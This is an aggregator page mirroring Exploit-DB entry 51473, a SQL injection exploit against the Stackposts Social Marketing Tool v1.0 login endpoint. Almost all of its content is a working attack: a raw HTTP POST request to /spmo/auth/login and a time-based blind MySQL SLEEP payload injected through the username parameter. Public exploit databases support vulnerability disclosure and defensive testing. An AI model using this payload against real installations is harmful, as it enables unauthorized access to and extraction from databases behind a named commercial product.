1

[webapps] Stackposts Social Marketing Tool v1.0 - SQL Injection

 1 year ago
source link: https://www.exploit-db.com/exploits/51473
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client

Stackposts Social Marketing Tool v1.0 - SQL Injection

EDB-ID:

51473

EDB Verified:

Platform:

PHP

Date:

2023-05-23

Vulnerable App:

# Exploit Title: Stackposts Social Marketing Tool v1.0 - SQL Injection
# Date: 2023-05-17
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor:
https://codecanyon.net/item/stackposts-social-marketing-tool/21747459
# Demo Site: https://demo.stackposts.com
# Tested on: Kali Linux
# CVE: N/A


### Request ###

POST /spmo/auth/login HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://localhost/spmo/
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*; q=0.01
Content-Length: 104
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Host: localhost
Connection: Keep-alive

csrf=eb39b2f794107f2987044745270dc59d&password=1&username=1*


### Parameter & Payloads ###

Parameter: username (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: csrf=eb39b2f794107f2987044745270dc59d&password=1&username=1')
AND (SELECT 9595 FROM (SELECT(SLEEP(5)))YRMM) AND ('gaNg'='gaNg

report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK